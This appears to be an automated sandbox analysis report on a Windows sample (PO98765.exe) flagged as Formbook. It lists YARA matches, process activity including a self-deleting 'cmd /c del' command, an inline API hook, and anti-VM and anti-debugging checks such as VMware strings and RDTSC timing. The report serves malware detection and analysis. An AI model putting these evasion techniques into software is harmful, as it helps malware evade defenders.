          Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: PO98765.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@5/3
          Source: C:\Users\user\Desktop\PO98765.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO98765.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
          Source: PO98765.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO98765.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\PO98765.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO98765.exeVirustotal: Detection: 14%
          Source: PO98765.exeReversingLabs: Detection: 10%
          Source: unknownProcess created: C:\Users\user\Desktop\PO98765.exe 'C:\Users\user\Desktop\PO98765.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\PO98765.exe C:\Users\user\Desktop\PO98765.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO98765.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO98765.exeProcess created: C:\Users\user\Desktop\PO98765.exe C:\Users\user\Desktop\PO98765.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO98765.exe'
          Source: C:\Users\user\Desktop\PO98765.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: C:\Users\user\Desktop\PO98765.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PO98765.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO98765.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.933997672.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO98765.exe, 00000001.00000002.716163299.00000000014B0000.00000040.00000001.sdmp, mstsc.exe, 00000003.00000002.924756958.00000000051FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO98765.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: PO98765.exe, 00000001.00000002.717167933.0000000003140000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: PO98765.exe, 00000001.00000002.717167933.0000000003140000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.933997672.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: PO98765.exe, erSe.cs | .Net Code: x1 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.PO98765.exe.350000.0.unpack, erSe.cs | .Net Code: x1 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.PO98765.exe.350000.0.unpack, erSe.cs | .Net Code: x1 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.PO98765.exe.ab0000.1.unpack, erSe.cs | .Net Code: x1 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.PO98765.exe.ab0000.0.unpack, erSe.cs | .Net Code: x1 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 0_2_02666408 push 8B5500CBh; retf
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 0_2_02666550 pushad ; retf
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 0_2_05BB6DDC pushad ; ret
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 0_2_05BB4C0F pushfd ; retf
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 0_2_05BB4BC7 push es; retf
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0041D075 push eax; ret
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0041C802 push esi; iretd
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0041D0C2 push eax; ret
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0041D0CB push eax; ret
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0041E172 pushfd ; ret
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0041D12C push eax; ret
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_004182CC push cs; retf
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0041E4F5 push dword ptr [537421FAh]; ret
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_00419C92 pushfd ; iretd
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0041674D push 8EAE14C8h; iretd
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_004167AE push C6E9D42Ah; ret
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0152D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0515D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C8D0CB push eax; ret
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C8D0C2 push eax; ret
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C8D075 push eax; ret
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C8C802 push esi; iretd
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C8E172 pushfd ; ret
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C8D12C push eax; ret
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C882CC push cs; retf
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C8E4F5 push dword ptr [537421FAh]; ret
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C89C92 pushfd ; iretd
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C867AE push C6E9D42Ah; ret
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_00C8674D push 8EAE14C8h; iretd
Source: initial sample | Static PE information: section name: .text entropy: 7.32069962776

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE3
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\PO98765.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mstsc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PO98765.exe PID: 484, type: MEMORY
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\PO98765.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PO98765.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO98765.exe | RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 0000000000C798E4 second address: 0000000000C798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 0000000000C79B4E second address: 0000000000C79B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO98765.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\user\Desktop\PO98765.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\PO98765.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\PO98765.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\Users\user\Desktop\PO98765.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_00409A80 rdtsc
Source: C:\Users\user\Desktop\PO98765.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PO98765.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PO98765.exe TID: 2740 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\Desktop\PO98765.exe TID: 4868 | Thread sleep time: -52388s >= -30000s
Source: C:\Users\user\Desktop\PO98765.exe TID: 6068 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2016 | Thread sleep time: -56000s >= -30000s
Source: C:\Windows\SysWOW64\mstsc.exe TID: 4600 | Thread sleep time: -48000s >= -30000s
Source: C:\Windows\SysWOW64\mstsc.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe | Last function: Thread delayed
Source: PO98765.exe, 00000000.00000002.682453988.0000000006220000.00000004.00000001.sdmp | Binary or memory string: VMware
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.696403684.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.700168754.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.696931835.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.700168754.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: explorer.exe, 00000002.00000000.700882472.000000000A897000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAb
Source: explorer.exe, 00000002.00000002.931560810.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: PO98765.exe, 00000000.00000002.682453988.0000000006220000.00000004.00000001.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareNC9EE2_AWin32_VideoController3K4TF8KSVideoController120060621000000.000000-000410.6620display.infMSBDAUK5GLFXWPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsD5XYEX9V
Source: explorer.exe, 00000002.00000000.696403684.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.700351269.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000002.00000000.696403684.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000002.00000000.700414904.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: PO98765.exe, 00000000.00000002.678398737.0000000002741000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.696403684.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\PO98765.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PO98765.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_00409A80 rdtsc
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0040ACC0 LdrLoadDll,
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014FB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014FB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014DC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014DB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014DB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014D9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014D9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014D9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0150513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_0150513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014F4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014F4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014F4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014F4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014F4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014DB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_015641E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_01502990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO98765.exe | Code function: 1_2_014FC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015949A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014F0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01592073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01553884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01553884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015020A0 mov eax, dword ptr fs:[00000030h]
